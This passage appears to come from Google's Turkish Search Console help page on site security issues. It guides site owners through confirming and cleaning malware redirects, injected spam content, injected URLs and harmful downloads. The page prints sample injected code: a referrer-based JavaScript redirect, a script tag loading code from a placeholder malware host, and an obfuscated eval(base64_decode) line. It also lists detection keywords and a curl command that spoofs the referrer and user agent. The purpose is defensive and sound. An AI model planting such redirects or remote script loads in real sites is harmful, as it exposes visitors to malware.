  • Komut satırından HTTP istekleri (bir sayfayı getirmek gibi) gerçekleştirmek için cURL veya Wget araçlarını kullanın. Ücretsiz kullanılabilen bu araçlar yönlendirmeleri teşhis etmeye yardımcı olur ve yönlendiren veya kullanıcı aracısı bilgilerini belirtme olanağı sunar. Bilgisayar korsanları, tespit edilmekten kaçınmak ve daha iyi hedefler seçmek için genellikle yalnızca belirli kullanıcı aracılarına veya yönlendirenlere saldırırlar. Bu araçları kullanmak hedefi taklit etmenizi sağlar. İsteğiniz spam içerikli davranış ortaya çıkarmıyorsa, farklı yönlendirme adreslerini (büyük web sitelerinden veya farklı arama motorlarından gelen bağlantılar gibi) kullanmayı deneyin. Örneğin, bir Windows makinesinde Google Arama sonuçlarından www.example.com/page.html adresine giden bir bağlantıyı takip eden kullanıcıyı taklit etmek için cURL'yi şu şekilde kullanırsınız:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Bilgisayar korsanı doğrudan sitenizin HTML dosyalarına (ör. bir JavaScript yönlendirmesi ekleme) veya sitenizin içeriğini üreten dosyalara (ör. PHP dosyalarına) zararlı kod yerleştirmiş olabilir.

Raporda listelenen güvenliği ihlal edilmiş bir sayfayı getirin ve yanıtı inceleyin. Bilgisayar korsanları, ziyaretçileri sitenizden kendi sitelerine yönlendirmek için birkaç farklı teknik kullanabilir; bunlardan bazılarını aşağıda görebilirsiniz:

  • Yeniden Yönlendirme:​
    • Üst bilgi yönlendirmeleri: Bilgisayar korsanları, sunucunuzun yapılandırma dosyalarını değiştirerek ziyaretçileri yönlendirebilir. Sunucu yapılandırma dosyaları genellikle site yöneticisinin bir web sitesindeki belirli sayfalar veya dizinler için URL yönlendirmeleri belirtmesine olanak verir. Örneğin, Apache sunucularında bunlar .htaccess ve httpd.conf dosyalarıdır.
      ...
      < HTTP/1.1 301 Moved Permanently
      < Date: Sun, 24 Feb 2013 21:06:45 GMT
      < Server: Apache
      < Location: http://<kötü-amaçlı-yazılım-sitesi>/index.html
      < Content-Length: 253
    • JavaScript yönlendirmeleri:
      <script>
        if (document.referrer.match(/google\.com/)) {
          window.location("http://<kötü-amaçlı-yazılım-sitesi>/");}
      <script>
  • Başka bir siteden yüklenen kötü amaçlı JavaScript:
    <script type='text/javascript' src='http://<kötü-amaçlı-yazılım-sitesi>/js/x55.js'></script>
  • Algılanmamak için şaşırtma yapan zararlı kodlar:
    eval(base64_decode("d2luZG93LmxvY2F0aW9uPScvL2dvb2dsZS5jb20nOw=="));

Yanıtlarınızda ve sitenizde şüpheli kodu arayın. Faydalı arama terimleri "search", "eval", "base64_decode" ve "unescape"tir.

3. Sitenizi temizleyin

Sitenizi temizlemeye hazır olduğunuzda, etkilenen dosyaları eldeki en son iyi yedekle değiştirebilir veya spam barındıran içeriği kendiniz kaldırabilirsiniz.

Buna ek olarak:

4. İnceleme isteğinde bulunun

Sitenizde sorunun düzeldiğini onayladığınızda, Güvenlik Sorunları raporunda bir güvenlik incelemesi isteyin. İncelemenin tamamlanması birkaç gün ile birkaç hafta arasında sürebilir.

Saldırı türü: İçerik yerleştirme

Bir bilgisayar korsanı, sitenizin sayfalarına spam içerikli bağlantılar veya metinler eklemiştir. Yerleştirilen içerikler ilaç terimleri veya sitenin içeriğiyle ilgili olmayan başka spam içerikleri olabilir.

Genelde, bilgisayar korsanları sitenizde aşağıdaki yöntemlerden birini kullanarak değişiklik yaparlar:

  • Sunucunuzdaki güvenli olmayan bir dizine erişim sağlayarak. Örneğin, bilmeyerek bir dizini açık izinlerle bırakmış olabilirsiniz.
  • Sitenizde çalışan bir yazılımdaki (ör. bir içerik yönetimi sistemi) güvenlik açığından yararlanarak. Örneğin, Drupal, Joomla! veya WordPress'in eski, güvenli olmayan bir sürümünü çalıştırıyor olabilirsiniz.
  • Sitenizde kullandığınız üçüncü taraf eklentilerine (ör. ziyaretçi sayaçları) saldırarak.

1. Bu sorunu düzeltip düzeltemeyeceğinize karar verin

Bu sorunu kendi başınıza düzeltmek için nelerin gerekli olabileceği veya bunun becerilerinizin dışında olduğunu düşünürseniz nasıl yardım bulacağınız konusunda bir fikir edinmek için Destek ekibi oluşturma konusuna bakın.

2. Sorunu onaylayın

Sitenizdeki zararlı kod bulaşmış sayfaları doğrudan görüntülemek için tarayıcı kullanmaktan kaçının.

Kötü amaçlı yazılımlar çoğunlukla tarayıcılardaki güvenlik açıklarını kullanarak yayıldığından, kötü amaçlı yazılımın bulaştığı bir sayfayı bir tarayıcıda açmak bilgisayarınıza zarar verebilir. Ayrıca, bilgisayar korsanları, spam içeriklerinin site sahipleri tarafından tespit edilmesini önlemek için gizleme teknikleri kullanabilirler.

İçeriği bilgisayarınızda daha güvenli bir şekilde görüntülemek için iki alternatif yöntem aşağıda verilmiştir:

  • Sayfanızı Google'ın gördüğü gibi görmek için URL Denetleme aracını kullanın. Çoğu bilgisayar korsanı yalnızca Google makineleri tarafından görünen değişiklikler yaptığı için bu yöntem faydalıdır. Örneğin, sitenizden kendi sitelerine bağlantılar ekleyip bunların yalnızca yönlendiren Google olduğunda oluşturulmasını sağlayabilirler.
  • Komut satırından HTTP istekleri (bir sayfayı getirmek gibi) gerçekleştirmek için cURL veya Wget araçlarını kullanın. Ücretsiz kullanılabilen bu araçlar yönlendirmeleri teşhis etmeye yardımcı olur ve yönlendiren veya kullanıcı aracısı bilgilerini belirtme olanağı sunar. Bilgisayar korsanları, tespit edilmekten kaçınmak ve daha iyi hedefler seçmek için genellikle yalnızca belirli kullanıcı aracılarına veya yönlendirenlere saldırırlar. Bu araçları kullanmak hedefi taklit etmenizi sağlar. İsteğiniz spam içerikli davranış ortaya çıkarmıyorsa, farklı yönlendirme adreslerini (büyük web sitelerinden veya farklı arama motorlarından gelen bağlantılar gibi) kullanmayı deneyin. Örneğin, bir Windows makinesinde Google Arama sonuçlarından www.example.com/page.html adresine giden bir bağlantıyı takip eden kullanıcıyı taklit etmek için cURL'yi şu şekilde kullanırsınız:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Sitenizdeki bazı sayfaları getirin ve yanıtlarda sizin eklemediğiniz şüpheli içerik veya bağlantıların olup olmadığına bakın. Örneğin, "viagra" gibi ilaçları veya "para kazanma" gibi spam içerikli terimleri arayın.

3. Sitenizi temizleyin

Sitenizi temizlemeye hazır olduğunuzda, etkilenen dosyaları eldeki en son iyi yedekle değiştirebilir veya her bir sayfadan spam barındıran içeriği ve bağlantıları kaldırabilirsiniz. Güvenlik Sorunları raporunda gösterilen tüm saldırı örneklerini düzelttiğinizden emin olun. Ayrıca, Google'da "site:" aramasını kullanarak ve web sitenizdeki kaynak dosyalarda arama yaparak saldırıya uğramış olabilecek diğer sayfaları arayın.

Buna ek olarak:

4. İnceleme isteğinde bulunun

Sitenizde sorunun düzeldiğini onayladığınızda, Güvenlik Sorunları raporunda bir güvenlik incelemesi isteyin. İncelemenin tamamlanması birkaç gün ile birkaç hafta arasında sürebilir.

Saldırı türü: URL yerleştirme

Bir bilgisayar korsanı, sitenizde genellikle spam içerikli kelimeler veya bağlantılar içeren yeni sayfalar oluşturmuştur. Bazen bu yeni sayfalar istemediğiniz şeyleri yapan kodlar içerirler; örneğin, kullanıcılarınızı başka sitelere yönlendirmek veya web sunucunuzun başka sitelere yönelik bir hizmet reddi saldırısına katılmasını sağlamak gibi.

1. Bu sorunu düzeltip düzeltemeyeceğinize karar verin

Bu sorunu kendi başınıza düzeltmek için nelerin gerekli olabileceği veya bunun becerilerinizin dışında olduğunu düşünürseniz nasıl yardım bulacağınız konusunda bir fikir edinmek için Destek ekibi oluşturma konusuna bakın.

2. Sorunu onaylayın

Sitenizdeki zararlı kod bulaşmış sayfaları doğrudan görüntülemek için tarayıcı kullanmaktan kaçının.

Kötü amaçlı yazılımlar çoğunlukla tarayıcılardaki güvenlik açıklarını kullanarak yayıldığından, kötü amaçlı yazılımın bulaştığı bir sayfayı bir tarayıcıda açmak bilgisayarınıza zarar verebilir. Ayrıca, bilgisayar korsanları, spam içeriklerinin site sahipleri tarafından tespit edilmesini önlemek için gizleme teknikleri kullanabilirler.

İçeriği bilgisayarınızda daha güvenli bir şekilde görüntülemek için iki alternatif yöntem aşağıda verilmiştir:

  • Sayfanızı Google'ın gördüğü gibi görmek için URL Denetleme aracını kullanın. Çoğu bilgisayar korsanı yalnızca Google makineleri tarafından görünen değişiklikler yaptığı için bu yöntem faydalıdır. Örneğin, sitenizden kendi sitelerine bağlantılar ekleyip bunların yalnızca yönlendiren Google olduğunda oluşturulmasını sağlayabilirler.
  • Komut satırından HTTP istekleri (bir sayfayı getirmek gibi) gerçekleştirmek için cURL veya Wget araçlarını kullanın. Ücretsiz kullanılabilen bu araçlar yönlendirmeleri teşhis etmeye yardımcı olur ve yönlendiren veya kullanıcı aracısı bilgilerini belirtme olanağı sunar. Bilgisayar korsanları, tespit edilmekten kaçınmak ve daha iyi hedefler seçmek için genellikle yalnızca belirli kullanıcı aracılarına veya yönlendirenlere saldırırlar. Bu araçları kullanmak hedefi taklit etmenizi sağlar. İsteğiniz spam içerikli davranış ortaya çıkarmıyorsa, farklı yönlendirme adreslerini (büyük web sitelerinden veya farklı arama motorlarından gelen bağlantılar gibi) kullanmayı deneyin. Örneğin, bir Windows makinesinde Google Arama sonuçlarından www.example.com/page.html adresine giden bir bağlantıyı takip eden kullanıcıyı taklit etmek için cURL'yi şu şekilde kullanırsınız:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Etkin olup olmadıklarını görmek için raporda listelenen örnek URL'leri sorgulayın. Bu sayfaları büyük olasılıkla siz oluşturmadığınızdan sayfaları sitenizden kaldırmanız veya sayfaları otomatik olarak oluşturan kodu silmeniz gerekir. Bu sayfaları nasıl bulacağınızı ve sitenizden nasıl temizleyeceğinizi okuyun.

Sizin oluşturmadığınız sayfaları bulmak için “site:” araması da yapabilirsiniz.

  • Küçük bir sitede, dizine eklediğimiz sayfaların bir listesini, sizin oluşturmadığınız sayfaların olup olmadığını görmek için Google Arama'da [site:example.com] araması yapabilirsiniz.
  • Daha büyük siteler için daha özelleştirilmiş bir sorgu kullanabilirsiniz. Örneğin:
    • [site:example.com eczane] - example.com'da "eczane" kelimesini içeren tüm sayfaları listeler. Eczane yerine, yaygın olarak kullanılan diğer spam içerikli terimleri koyun
    • [site:example.com/wp-admin/] - WordPress sitenizin site yöneticisi bölümündeki tüm sayfaları listeler.

3. Sitenizi temizleyin

Sitenizi temizlemeye hazır olduğunuzda, etkilenen dizinleri eldeki en son iyi yedekle değiştirebilir veya istenmeyen sayfaları ve dosyaları ya da bilgisayar korsanının onları oluşturmak için kullandığı işlevleri kaldırabilirsiniz.

Buna ek olarak:

4. İnceleme isteğinde bulunun

Sitenizde sorunun düzeldiğini onayladığınızda, Güvenlik Sorunları raporunda bir güvenlik incelemesi isteyin. İncelemenin tamamlanması birkaç gün ile birkaç hafta arasında sürebilir.

Zararlı indirme işlemleri

Siteniz, kullanıcılara Google Güvenli Tarama'nın kötü amaçlı yazılım veya istenmeyen yazılım olduğunu düşündüğü bir yükleme sunmaktadır. Bir kullanıcı sitenizi ziyaret ettiğinde Chrome tarayıcısı bir uyarı gösterebilir. Uyarıyı kaldırmak için bu indirmeleri sitenizden kaldırmanız gerekir.

1. Sorunu değerlendirin

Bu indirmeler bilinçli olarak oluşturulduysa bunları sitenizden kaldırın ve İnceleme isteyin adımına geçin.

Sitenizdeki bir indirme olduğundan haberdar değilseniz saldırıya uğramış olabilirsiniz. Saldırıya uğrayan sitenizi düzeltmeniz ve indirmeleri bulup kaldırmanız gerekir.

2. Bu sorunu düzeltip düzeltemeyeceğinize karar verin

Bu sorunu kendi başınıza düzeltmek için nelerin gerekli olabileceği veya bunun becerilerinizin dışında olduğunu düşünürseniz nasıl yardım bulacağınız konusunda bir fikir edinmek için Destek ekibi oluşturma konusuna bakın.

3. Sorunu onaylayın

Bu indirmelerin varlığını onaylamak için sitenizdeki örnek sayfaların bazılarını görüntüleyin.

4. Sitenizi temizleyin

Sitenizle ilgili olarak temizlik adımlarını ve sitenizin tekrar saldırıya uğramasını önlemeye yönelik ipuçlarını da içeren eksiksiz bir düzeltme akışı için, saldırıya uğramış siteler kılavuzunu okuyun. Sitenizi temizlemeye hazır olduğunuzda, etkilenen dosyaları eldeki en son iyi yedekle değiştirebilir veya spam barındıran içeriği kendiniz kaldırabilirsiniz. İkili programları ve sitenizde barındırılan diğer içerikleri taramak için virüsten korunma yazılımı kullanın. Virüsten korunma yazılımları çok sayıda kötü amaçlı veya istenmeyen yazılımı bulabilir, ancak maalesef hepsini bulamaz. Yazılımınızı bir virüsten korunma programına (veya VirusTotal gibi virüsten korunma destek hizmetine) göndermeniz, yazılımınızla ilgili olası sorunlar için bir gösterge sağlayacaktır. Google Güvenli Tarama, bir programın veya ikili programın istenmeyen yazılım veya kötü amaçlı yazılım olup olmadığını belirlemek için kendi ölçütlerini uygular.

5. Düzeltmelerinizi onaylayın

Sitenizin İstenmeyen Yazılım Politikası'na uyduğundan emin olun.

6. İnceleme isteğinde bulunun

Sitenizde sorunun düzeldiğini onayladığınızda, Güvenlik Sorunları raporunda bir güvenlik incelemesi isteyin. İncelemenin tamamlanması birkaç gün ile birkaç hafta arasında sürebilir.

Zararlı indirmelere bağlantılar

Siteniz, Google Güvenli Tarama'ya göre kötü amaçlı yazılım veya istenmeyen yazılım olan indirmeler sunan sitelere bağlantı vermektedir. Bir kullanıcı sitenizi ziyaret ettiğinde Chrome tarayıcısı bir uyarı gösterebilir. Uyarıyı kaldırmak için zararlı sitelere verilen bağlantıları kaldırmanız gerekir.

1. Sorunu değerlendirin

Bu bağlantılar bilinçli olarak oluşturulduysa bunları sitenizden kaldırın ve İnceleme isteyin adımına geçin.

Bu bağlantılardan haberdar değilseniz saldırıya uğramış olabilirsiniz.

2. Bu sorunu düzeltip düzeltemeyeceğinize karar verin

Saldırıya uğradıysanız bu sorunu kendi başınıza düzeltmek için nelerin gerekli olabileceği veya bunun becerilerinizin dışında olduğunu düşünürseniz nasıl yardım bulacağınız konusunda bir fikir edinmek için Destek ekibi oluşturma konusuna bakın.

3. Sorunu onaylayın

 

Bu indirmelerin varlığını onaylamak için sitenizdeki örnek sayfaların bazılarını görüntüleyin. Bazı durumlarda, bilgisayar korsanları site sahibi olduğunuzu düşünüyorlarsa bu bağlantıları gizleyebilir. Bu nedenle, örnek URL’leri URL Denetleme aracıyla veya farklı bir hesaba giriş yaparak ya da başka bir bilgisayarda ziyaret etmeyi deneyin.

4. Sitenizi temizleyin

Sitenizle ilgili olarak temizlik adımlarını ve sitenizin tekrar saldırıya uğramasını önlemeye yönelik ipuçlarını da içeren eksiksiz bir düzeltme akışı için, saldırıya uğramış siteler kılavuzunu okuyun. Sitenizi temizlemeye hazır olduğunuzda, etkilenen dosyaları eldeki en son iyi yedekle değiştirebilir veya spam barındıran içeriği kendiniz kaldırabilirsiniz.

5. Düzeltmelerinizi onaylayın

Sitenizin İstenmeyen Yazılım Politikası'na uyduğundan emin olun.

6. İnceleme isteğinde bulunun

Sitenizde sorunun düzeldiğini onayladığınızda, Güvenlik Sorunları raporunda bir güvenlik incelemesi isteyin. İncelemenin tamamlanması birkaç gün ile birkaç hafta arasında sürebilir.

Anlaşılır olmayan mobil faturalandırma

Google, mobil ücretler konusunda sitenizin kullanıcılara yeterli bilgi vermediğini tespit etmiştir. Chrome, kullanıcının ücret alınmasına neden olacak sayfaları yüklemeden önce uyarı görüntüleyebilir.

1. Sorunu onaylayın

Anlaşılır olmayan mobil faturalandırma davranışının hangi sayfalarda olduğunu görmek için raporda listelenen örnek URL’leri ziyaret edin. Buradaki mobil faturalandırma yönergelerini inceleyin.

2. Sorunu çözün

Sayfalarınızı mobil faturalandırma en iyi uygulamalarına uyacak şekilde düzeltin.

3. İnceleme isteğinde bulunun

Sitenizde sorunun düzeldiğini onayladığınızda, Güvenlik Sorunları raporunda bir güvenlik incelemesi isteyin. İncelemenin tamamlanması birkaç gün ile birkaç hafta arasında sürebilir.

Yaygın olmayan indirmeler

Siteniz, Google Güvenli Tarama'nın daha önce görmediği bir indirme sunmaktadır. Chrome tarayıcısı bu dosyanın nadiren indirildiği ve tehlikeli olabileceği konusunda uyarıda bulunabilir. Google Güvenli Tarama özelliği, dosyaların güvenli olduğunu doğrularsa bu uyarılar otomatik olarak kaldırılır. Bu sorun için her zaman örnek URL'lerin verilmediğini unutmayın.

Bu sorun, sayfanızın veya sitenizin Google Arama sonuçlarında görünmesini engellemez, ancak bir kullanıcı bilinmeyen dosyaları ilk kez indirmek istediğinde Chrome tarayıcısında bir uyarı gösterilir.

1. Sorunu çözün

İndirmelerinizin indirme yönergelerine uygun olup olmadığını öğrenin ve onaylayın.

  • Sitenizde indirilen içerikler bu yönergeleri ihlal ediyorsa bunları kaldırın.
  • Bir indirme işlemi bu yönergeleri ihlal etmiyorsa kaldırmanız gerekmez.

2. İnceleme isteğinde bulunun

Dosyaları kaldırmayı tamamladığınızda (veya indirmelerinizin indirme yönergelerine uygun olduğunu doğruladığınızda), Güvenlik Sorunları raporunda bir güvenlik incelemesi isteyin. İncelemenin tamamlanması birkaç gün ile birkaç hafta arasında sürebilir. İnceleme isteği olmasa bile, Google en çok indirilen öğeleri değerlendirip bunları kabul edilebilir veya zararlı olarak sınıflandırır. Yine de inceleme isteğinin gönderilmesi değerlendirme sürecini hızlandırabilir.

 

Manuel İşlemler raporu ile Güvenlik Sorunları raporu arasında ne fark vardır?

Manuel İşlemler raporunda, bir sayfa veya siteyle ilgili olup çoğunlukla arama dizinimizi etkileme girişimlerinden oluşan, ancak kullanıcılar için çok tehlikeli olmayan sorunlar listelenir. Burada rapor edilen çoğu sorun, kullanıcıya görsel bir uyarıda bulunulmaksızın sayfaların veya sitenin sıralamasının düşürülmesine ya da arama sonuçlarından çıkarılmasına neden olur.

Güvenlik Sorunları raporunda, sitenizin saldırıya uğradığını gösteren belirtiler veya sitenizdeki bir ziyaretçiye ya da ziyaretçinin bilgisayarına zarar verebilecek davranışlar listelenir: Örneğin, kimlik avı saldırıları veya kullanıcının bilgisayarına kötü amaçlı ya da istenmeyen yazılımların yüklenmesi. Bu sayfalar, arama sonuçlarında uyarı etiketiyle görüntülenir veya kullanıcı bu sayfaları ziyaret etmeyi denediğinde tarayıcı, uyarı amaçlı bir geçiş sayfası görüntüleyebilir.

Bu size yardımcı oldu mu?
Bunu nasıl iyileştirebiliriz?